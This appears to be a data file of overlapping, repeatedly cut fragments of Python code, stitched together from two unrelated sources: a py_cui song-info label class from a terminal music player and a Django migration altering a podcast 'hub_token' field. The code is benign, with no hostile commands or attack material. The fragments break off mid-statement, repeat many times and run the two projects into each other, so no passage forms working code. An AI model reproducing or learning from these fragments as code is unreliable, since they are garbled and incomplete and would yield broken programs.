file_path=File().get_file_path() text=\"\"\" Actual path: {} No", "_center:bool=False window:py_cui.widget_set.WidgetSet def __init__(self,window:py_cui.widget_set.WidgetSet): self.window=window self.block_label=self.window.add_block_label(self._initial_text(),self._row,self._column, row_span=self._row_span,column_span=self._column_span,center=self._center) self.__config() def _initial_text(self): file_path=File().get_file_path() text=\"\"\" Actual", "self.window=window self.block_label=self.window.add_block_label(self._initial_text(),self._row,self._column, row_span=self._row_span,column_span=self._column_span,center=self._center) self.__config() def _initial_text(self): file_path=File().get_file_path() text=\"\"\" Actual path: {} No Song", "No Song Selected \"\"\".format(file_path) return text def set_song_info(self,song_file:SongFile): pass def __config(self): \"\"\" Function", "SongInfoBlockLabel: _row:int=0 _column:int=2 _row_span:int=2 _column_span:int=3 _center:bool=False window:py_cui.widget_set.WidgetSet def __init__(self,window:py_cui.widget_set.WidgetSet): self.window=window self.block_label=self.window.add_block_label(self._initial_text(),self._row,self._column, row_span=self._row_span,column_span=self._column_span,center=self._center) self.__config()", "\"\"\".format(file_path) return text def set_song_info(self,song_file:SongFile): pass def __config(self): \"\"\" Function that configure the", "row_span=self._row_span,column_span=self._column_span,center=self._center) self.__config() def _initial_text(self): file_path=File().get_file_path() text=\"\"\" Actual path: {} No Song Selected \"\"\".format(file_path)", "window:py_cui.widget_set.WidgetSet def __init__(self,window:py_cui.widget_set.WidgetSet): self.window=window self.block_label=self.window.add_block_label(self._initial_text(),self._row,self._column, row_span=self._row_span,column_span=self._column_span,center=self._center) self.__config() def _initial_text(self): file_path=File().get_file_path() text=\"\"\" Actual path:", "py_cui from pymusicterm.music import SongFile from pymusicterm.util.file import File, FileMetadata class SongInfoBlockLabel: _row:int=0", "SongFile from pymusicterm.util.file import File, FileMetadata class SongInfoBlockLabel: _row:int=0 _column:int=2 _row_span:int=2 _column_span:int=3 _center:bool=False", "File, FileMetadata class SongInfoBlockLabel: _row:int=0 _column:int=2 _row_span:int=2 _column_span:int=3 _center:bool=False window:py_cui.widget_set.WidgetSet def __init__(self,window:py_cui.widget_set.WidgetSet): self.window=window", "path: {} No Song Selected \"\"\".format(file_path) return text def set_song_info(self,song_file:SongFile): pass def __config(self):", "import SongFile from pymusicterm.util.file import File, FileMetadata class SongInfoBlockLabel: _row:int=0 _column:int=2 _row_span:int=2 _column_span:int=3", "file_path=File().get_file_path() text=\"\"\" Actual path: {} No Song Selected \"\"\".format(file_path) return text def set_song_info(self,song_file:SongFile):", "Song Selected \"\"\".format(file_path) return text def set_song_info(self,song_file:SongFile): pass def __config(self): \"\"\" Function that", "_column:int=2 _row_span:int=2 _column_span:int=3 _center:bool=False window:py_cui.widget_set.WidgetSet def __init__(self,window:py_cui.widget_set.WidgetSet): self.window=window self.block_label=self.window.add_block_label(self._initial_text(),self._row,self._column, row_span=self._row_span,column_span=self._column_span,center=self._center) self.__config() def _initial_text(self):", "from pymusicterm.music import SongFile from pymusicterm.util.file import File, FileMetadata class SongInfoBlockLabel: _row:int=0 _column:int=2", "_row_span:int=2 _column_span:int=3 _center:bool=False window:py_cui.widget_set.WidgetSet def __init__(self,window:py_cui.widget_set.WidgetSet): self.window=window self.block_label=self.window.add_block_label(self._initial_text(),self._row,self._column, row_span=self._row_span,column_span=self._column_span,center=self._center) self.__config() def _initial_text(self): file_path=File().get_file_path()", "import py_cui from pymusicterm.music import SongFile from pymusicterm.util.file import File, FileMetadata class SongInfoBlockLabel:", "Selected \"\"\".format(file_path) return text def set_song_info(self,song_file:SongFile): pass def __config(self): \"\"\" Function that configure", "FileMetadata class SongInfoBlockLabel: _row:int=0 _column:int=2 _row_span:int=2 _column_span:int=3 _center:bool=False window:py_cui.widget_set.WidgetSet def __init__(self,window:py_cui.widget_set.WidgetSet): self.window=window self.block_label=self.window.add_block_label(self._initial_text(),self._row,self._column,", "class SongInfoBlockLabel: _row:int=0 _column:int=2 _row_span:int=2 _column_span:int=3 _center:bool=False window:py_cui.widget_set.WidgetSet def __init__(self,window:py_cui.widget_set.WidgetSet): self.window=window self.block_label=self.window.add_block_label(self._initial_text(),self._row,self._column, row_span=self._row_span,column_span=self._column_span,center=self._center)", "self.__config() def _initial_text(self): file_path=File().get_file_path() text=\"\"\" Actual path: {} No Song Selected \"\"\".format(file_path) return", "def set_song_info(self,song_file:SongFile): pass def __config(self): \"\"\" Function that configure the widget \"\"\" self.block_label._draw_border=True", "Actual path: {} No Song Selected \"\"\".format(file_path) return text def set_song_info(self,song_file:SongFile): pass def" ]
[ "] operations = [ migrations.AlterField( model_name=\"podcast\", name=\"hub_token\", field=models.UUIDField(blank=True, editable=False, null=True, unique=True), ), ]", "Migration(migrations.Migration): dependencies = [ (\"podcasts\", \"0042_podcast_hub_exception\"), ] operations = [ migrations.AlterField( model_name=\"podcast\", name=\"hub_token\",", "from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ (\"podcasts\", \"0042_podcast_hub_exception\"), ]", "[ (\"podcasts\", \"0042_podcast_hub_exception\"), ] operations = [ migrations.AlterField( model_name=\"podcast\", name=\"hub_token\", field=models.UUIDField(blank=True, editable=False, null=True,", "3.2.7 on 2021-09-18 10:42 from django.db import migrations, models class Migration(migrations.Migration): dependencies =", "import migrations, models class Migration(migrations.Migration): dependencies = [ (\"podcasts\", \"0042_podcast_hub_exception\"), ] operations =", "# Generated by Django 3.2.7 on 2021-09-18 10:42 from django.db import migrations, models", "models class Migration(migrations.Migration): dependencies = [ (\"podcasts\", \"0042_podcast_hub_exception\"), ] operations = [ migrations.AlterField(", "10:42 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ (\"podcasts\", \"0042_podcast_hub_exception\"),", "migrations, models class Migration(migrations.Migration): dependencies = [ (\"podcasts\", \"0042_podcast_hub_exception\"), ] operations = [", "class Migration(migrations.Migration): dependencies = [ (\"podcasts\", \"0042_podcast_hub_exception\"), ] operations = [ migrations.AlterField( model_name=\"podcast\",", "django.db import migrations, models class Migration(migrations.Migration): dependencies = [ (\"podcasts\", \"0042_podcast_hub_exception\"), ] operations", "\"0042_podcast_hub_exception\"), ] operations = [ migrations.AlterField( model_name=\"podcast\", name=\"hub_token\", field=models.UUIDField(blank=True, editable=False, null=True, unique=True), ),", "on 2021-09-18 10:42 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [", "2021-09-18 10:42 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ (\"podcasts\",", "dependencies = [ (\"podcasts\", \"0042_podcast_hub_exception\"), ] operations = [ migrations.AlterField( model_name=\"podcast\", name=\"hub_token\", field=models.UUIDField(blank=True,", "Generated by Django 3.2.7 on 2021-09-18 10:42 from django.db import migrations, models class", "by Django 3.2.7 on 2021-09-18 10:42 from django.db import migrations, models class Migration(migrations.Migration):", "= [ (\"podcasts\", \"0042_podcast_hub_exception\"), ] operations = [ migrations.AlterField( model_name=\"podcast\", name=\"hub_token\", field=models.UUIDField(blank=True, editable=False,", "(\"podcasts\", \"0042_podcast_hub_exception\"), ] operations = [ migrations.AlterField( model_name=\"podcast\", name=\"hub_token\", field=models.UUIDField(blank=True, editable=False, null=True, unique=True),", "Django 3.2.7 on 2021-09-18 10:42 from django.db import migrations, models class Migration(migrations.Migration): dependencies" ]